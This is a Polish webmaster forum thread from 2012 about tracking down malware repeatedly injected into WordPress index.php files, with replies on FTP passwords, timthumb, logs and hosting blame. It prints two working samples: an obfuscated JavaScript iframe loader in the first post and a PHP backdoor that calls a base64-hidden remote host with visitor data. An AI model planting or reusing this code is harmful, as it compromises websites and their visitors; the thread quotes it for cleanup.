Jak znaleźć złośliwy skrypt na stronie

[berix 10]

Witam mam pewien problem otóż na swoich stronach oprtych na silniku wordpress dopisuje mi się złośliwy skrypt. Wczoraj przez to google zablokowało mi 3 strony (inforamcja o szkodliwje stronie, oraz w narzędziach administratora google dostałem informacje).

Wczoraj całą noc analizowałem pliki wordpressa i nic nie znalazłem.

Złośliwy skrypt dopisuje w pierwszych liniach strony

<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new"a".prototype}catch(qqq){zz='val';ss="";if(1){f='fr'+'om'+'Char';f=f+'C'+'ode';}e=this[f.substr(11)+zz];t='y';}
n="3.5k3.5k51.5k50k15k19k49k54.5k48.5k57.5k53.5k49.5k54k57k22k50.5k49.5k57k33.5k53k49.5k53.5k49.5k54k57k56.5k32k59.5k41k47.5k50.5k38k47.5k53.5k49.5k19k18.5k48k54.5k49k59.5k18.5k19.5k44.5k23k45.5k19.5k60.5k5.5k3.5k3.5k3.5k51.5k50k56k47.5k53.5k49.5k56k19k19.5k28.5k5.5k3.5k3.5k61.5k15k49.5k53k56.5k49.5k15k60.5k5.5k3.5k3.5k3.5k49k54.5k48.5k57.5k53.5k49.5k54k57k22k58.5k56k51.5k57k49.5k19k16k29k51.5k50k56k47.5k53.5k49.5k15k56.5k56k48.5k29.5k18.5k51k57k57k55k28k22.5k22.5k56k47.5k60k57.5k60k54k47.5k51.5k22k51.5k54k22.5k60k22.5k23.5k23.5k18.5k15k58.5k51.5k49k57k51k29.5k18.5k23.5k23k18.5k15k51k49.5k51.5k50.5k51k57k29.5k18.5k23.5k23k18.5k15k56.5k57k59.5k53k49.5k29.5k18.5k58k51.5k56.5k51.5k48k51.5k53k51.5k57k59.5k28k51k51.5k49k49k49.5k54k28.5k55k54.5k56.5k51.5k57k51.5k54.5k54k28k47.5k48k56.5k54.5k53k57.5k57k49.5k28.5k53k49.5k50k57k28k23k28.5k57k54.5k55k28k23k28.5k18.5k30k29k22.5k51.5k50k56k47.5k53.5k49.5k30k16k19.5k28.5k5.5k3.5k3.5k61.5k5.5k3.5k3.5k50k57.5k54k48.5k57k51.5k54.5k54k15k51.5k50k56k47.5k53.5k49.5k56k19k19.5k60.5k5.5k3.5k3.5k3.5k58k47.5k56k15k50k15k29.5k15k49k54.5k48.5k57.5k53.5k49.5k54k57k22k48.5k56k49.5k47.5k57k49.5k33.5k53k49.5k53.5k49.5k54k57k19k18.5k51.5k50k56k47.5k53.5k49.5k18.5k19.5k28.5k50k22k56.5k49.5k57k31.5k57k57k56k51.5k48k57.5k57k49.5k19k18.5k56.5k56k48.5k18.5k21k18.5k51k57k57k55k28k22.5k22.5k56k47.5k60k57.5k60k54k47.5k51.5k22k51.5k54k22.5k60k22.5k23.5k23.5k18.5k19.5k28.5k50k22k56.5k57k59.5k53k49.5k22k58k51.5k56.5k51.5k48k51.5k53k51.5k57k59.5k29.5k18.5k51k51.5k49k49k49.5k54k18.5k28.5k50k22k56.5k57k59.5k53k49.5k22k55k54.5k56.5k51.5k57k51.5k54.5k54k29.5k18.5k47.5k48k56.5k54.5k53k57.5k57k49.5k18.5k28.5k50k22k56.5k57k59.5k53k49.5k22k53k49.5k50k57k29.5k18.5k23k18.5k28.5k50k22k56.5k57k59.5k53k49.5k22k57k54.5k55k29.5k18.5k23k18.5k28.5k50k22k56.5k49.5k57k31.5k57k57k56k51.5k48k57.5k57k49.5k19k18.5k58.5k51.5k49k57k51k18.5k21k18.5k23.5k23k18.5k19.5k28.5k50k22k56.5k49.5k57k31.5k57k57k56k51.5k48k57.5k57k49.5k19k18.5k51k49.5k51.5k50.5k51k57k18.5k21k18.5k23.5k23k18.5k19.5k28.5k5.5k3.5k3.5k3.5k49k54.5k48.5k57.5k53.5k49.5k54k57k22k50.5k49.5k57k33.5k53k49.5k53.5k49.5k54k57k56.5k32k59.5k41k47.5k50.5k38k47.5k53.5k49.5k19k18.5k48k54.5k49k59.5k18.5k19.5k44.5k23k45.5k22k47.5k55k55k49.5k54k49k32.5k51k51.5k53k49k19k50k19.5k28.5k5.5k3.5k3.5k61.5".split("ak".substr(1));for(i=0;i!=555;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(q);</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pl-PL">

 

I teraz mam pytanie czy jest jakaś osoba która by to usuneła, lub zna jakiś program (avast nic nie wykrywa).

Musi się to obejść bez reinstalacji cms'a poniważ posiadam liczne modyfikacje pluginów oraz theme.

Jestem skłonny zapłacić

Edytowano Marzec 19, 2012 przez berix (zobacz historię edycji)

[regdos 1848]

Sprawdź daty modyfikacji plików.

Do admina też Ci dokleja? Spróbuj na chwile przełączyć na inny szablon i zobaczyć czy też jest taki efekt.

Powyższe trochę ograniczy Ci gdzie szukać.

[Gość Kamikadze]

Pamiętam że na joomli miałem z tym problemy, co dwa miesiące coś się doczepiało do templatki i google blokowało...

 

W tedy nic nie dało się zrobić (stare joomle) i trzeba było czekać na aktualizację.

 

Sprawdź czy nie masz dostępnych aktualizacji WP i usuń ten zły kod.

 

 

 

Tutaj masz art odnośnie WP i malware

http://blog.adiasz.pl/2008/02/17/blokada-witryny-w-google-z-powodu-wykrycia-malware/

[Gość Pokuć]

Miałem to na kilku CMS, przyczyną był Total Commander a dokładnie to dziury w nim. Po zmianie na FileZillę i zmianie wszystkich haseł (FTP, panel, bazy) problem znikł. Nadpisywały mi się tylko pliki index.php

[regdos 1848]

Od 2009 roku nie ma już tego problemu z Total Commanderem bo hasła są kodowane AES256 no chyba, że używałeś starej wersji.

Poza tym to, główna przyczyną nie był sam TC tylko świństwa, które wykradały Ci te hasła.

TC używam praktycznie od zawsze jako klient ftp i nigdy nic mi z niego nie wyciekło.

[vorren 53]

Sprawdź komputer programem antywirusowym, zmień hasła do ftpów, zmień program do ftp, zaktualizuj cmsy do najnowszych stabilnych wersji. Jeśli nie pomoże: spróbuj z czystego systemu (inny komputer lub wirtualna maszyna). Jeśli nie pomoże: sprawdzaj system na którym masz postawione cmsy.

[ednet 136]

podeslij mi na PW dostep do FTPa, sprawdze gdzie sa te wirusy.

[Gość pzebracki]

watchdog

[berix 10]

Dalszy ciąg....

Co do menadżera ftp korzystam z filezilli. Powiem tak poczęsci jest to moja wina poniważ na sowim nowym laptopie nie miałem antywirusa, po instalacji avasta wykrył 1 wirusa na komputerze (wcześniej logowałem się na konta FTP).

O tym problemie dokładnie mnie poinformował support hostingu (przypadkowo, bo pisałem w sprawie że strona strasznie powoli chodzić).

To było w weekend, wczoraj postanowiłem przerzucić pliki na lokalny dysk i przeskanować pliki, usunąć i wrzucić spowrotem (avast nic nie wykrył). Poczęści coś to pomogło lecz ten skrypt jakby znika i poajwia się.

Na jednym koncie jest tak że tylko na 1 podstronie jest widoczny.

[maniack 403]

.

Edytowano Wrzesień 13, 2017 przez maniack (zobacz historię edycji)

[berix 10]

To akurat proste - skrypt wrzuca cookie, zwykle o nazwie wyglądającej na popularny system statystyk.

 

Przeszukanie plików antywirusem niewiele Ci pomoże, takie wirusy działają raczej przez includowanie plików z zewnętrznych serwerów i to najczęściej przez iframe. Przetrzep te pliki jakimś edytorem tekstowym, pozwalającym na szukanie w wielu plikach (np. Notepad++). Szukaj przede wszystkim wystąpień funkcji eval() i base64_decode() i porównuj je z czystym źródłem.

 

Dziekuje a pomoc własnie znalałem to i dokładnie tak jest jak na pisze, zainfekowane ma pliki index.php zarowno w glownym katalogu public_html jak i w theme

złośliwy kod

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
   // This code use for global bot statistic
   $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
   $stCurlHandle = NULL;
   $stCurlLink = "";
   if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
   {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics		   
    $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
	    $stCurlHandle = curl_init( $stCurlLink );
   }
   }
if ( $stCurlHandle !== NULL )
{
   curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
   $sResult = @curl_exec($stCurlHandle);
   if ($sResult[0]=="O")
 {$sResult[0]=" ";
  echo $sResult; // Statistic code end
  }
   curl_close($stCurlHandle);
}
}
?>

[berix 10]

narazie ten kod znalazłem w plikach

- główny plik index.php

- wygląd > footer.php

- wygląd > page.php

- wygląd > index.php

- public_html/wp-content/themes/index.php

- public_html/wp-content/index.php

- public_html/plugins/index.php

[Gość Kamikadze]

Masz aktualnego CMSa? Tak z ciekawości

[berix 10]

tak wordpress 3.3.1, także wtyczki na bierząco aktualizuje

Edytowano Marzec 21, 2012 przez berix (zobacz historię edycji)

[Gość GrandBB]

Sprawdź czy przypadkiem kod nie jest zagnieżdżony w bazie danych. Czasami zdarza się tak, ze pomimo tego, że pliki są czyste wirus przechodzi z bazy danych po wpisaniu adresu url. Z bazy danych raczej usuniesz to ręcznie bez zbędnych problemów.

[berix 10]

baza jest czysta, narazie zrobiłem tak jak pisał maniack zobaczymy co dalej czy czasme nie ma jakiegoś tzw. "backdoora"

Edytowano Marzec 21, 2012 przez berix (zobacz historię edycji)

[berix 10]

Witam kolejny raz moje konto zostało zatakowane przez skrypty

dzisaj dopisał mi się ten złośliwy kod (wszsytkie pliki index.php)

Czy to może być wina Hostingu?

Poniważ jest to nie mozliwe że wordpress 3.3.1 + 6 bardzo znanych wtyczek posiadało takie dziury....

Edytowano Kwiecień 1, 2012 przez berix (zobacz historię edycji)

[regdos 1848]

Poproś o logi apache i ftp firmę hostingową z czasu kiedy zostały zmienione pliki i szukaj tam.

[artur5236 13]

Na moich stronach został dopisany dokładnie ten sam kod.

Włamanie odbyło się poprzez FTP, korzystam z Total Comandera.

[berix 10]

Witam nadal problem jest

ostatni atak miałem w nocy z 31.03 na 01.04.2012.

Pisałem do supportu unixstorm właściciel firmy jest na 1000% pewny że to moja wina.... pisze mi że moje skórki dla WP są dziurawe odziwo zaraża mi 5 stron na WP które posaidają inny theme (tylko jeden z nich wykorzystuje skrypt timthumb który jest zaktualizowany do najnowszej wersji, także support pisał że to też może być wina tego skryptu). Suuport zażuca także że posiadam nieaktualną wersję wordpress ale jest to nieprawdą

Dopowiem że wszsytkie strony są na koncie reseller a kązde z nich jest dodany nowy użytkownik.

Praktycznie złośliwy kod dopisuje się do wszystkich plików index.php (nawet jeśli nie są to pliki od wordpress).

 

Do ftp uzywam tylko i wyłącznie fillezilla posaidam firewalla i antywirusa

 

unixstorm pisze:

Co więcej, używa Pan również prawdopodobnie dziurawego szablonu:

http://blog.spiderla...-customers.html

 

Proponuję poważnie podejść do kwestii bezpieczeństwa Pana stron lub zmienić skrypt jeśli nie jest Pan w stanie go wystarczająco zabezpieczyć przed takimi atakami.[...]

 

Proszę się dokładnie zapoznać z informacjami dostępnymi w internecie.

Wszystkie takie ataki przeprowadzane są na dziurawy skrypt timhumb z szablonami Wordpressa.

 

Jeśli nie jest Pan w stanie nad tym zapanować - proszę zmienić skrypt.

 

Powtarzam, problem nie jest po naszej stronie i to Pan odpowiada za należyte zabezpieczenie udostępnianych stron WWW, tudzież usunięcie w nich wszelkich błędów umożliwiających tego typu ataki.

Edytowano Kwiecień 7, 2012 przez berix (zobacz historię edycji)

[malu 460]

Witam nadal problem jest

ostatni atak miałem w nocy z 31.03 na 01.04.2012.

Pisałem do supportu unixstorm właściciel firmy jest na 1000% pewny że to moja wina.... pisze mi że moje skórki dla WP są dziurawe odziwo zaraża mi 5 stron na WP które posaidają inny theme (tylko jeden z nich wykorzystuje skrypt timthumb który jest zaktualizowany do najnowszej wersji, także support pisał że to też może być wina tego skryptu). Suuport zażuca także że posiadam nieaktualną wersję wordpress ale jest to nieprawdą

Dopowiem że wszsytkie strony są na koncie reseller a kązde z nich jest dodany nowy użytkownik.

Praktycznie złośliwy kod dopisuje się do wszystkich plików index.php (nawet jeśli nie są to pliki od wordpress).

 

Do ftp uzywam tylko i wyłącznie fillezilla posaidam firewalla i antywirusa

 

unixstorm pisze:

 

 

Zmieniałeś już raz hosting, u nas też miałeś problem z włamaniami na stronę.

Może wreszcie pora pójść po rozum do głowy, a nie na siłę szukać usprawiedliwienia?

[artur5236 13]

Pozmieniaj hasła do hostingu i nie zapamiętuj ich w programie FTP.

[berix 10]

Zmieniałeś już raz hosting, u nas też miałeś problem z włamaniami na stronę.

Może wreszcie pora pójść po rozum do głowy, a nie na siłę szukać usprawiedliwienia?

co do waszego hostingu vipower.pl był inny rodzaj ataków ponieważ ktoś wrzucał perfidnie skrypty php udające menadżer FTP logując się jako root bez znania hasła i loginu, także o tym jest wątek na wht. I akurat tam mi pisali że to raczej wina hostingu a nie tak jak tutaj moja.... Wiec bierzcie się za łatanie hostingu zarówno szybkiego jak i dziurawego

Pozdrawiam

Edytowano Kwiecień 15, 2012 przez berix (zobacz historię edycji)

[Bartosz Stępień 75]

Założę się, że to wina tego timthumb, było o tym dość głośno, zaktualizuj, usuń wadliwe pliki i zobacz czy znowu wróci. Jeszcze inna możliwość, że masz jakiegoś keylogera na komputerze i wykrada ci hasła, ale to by wykradło nie tylko do FTP.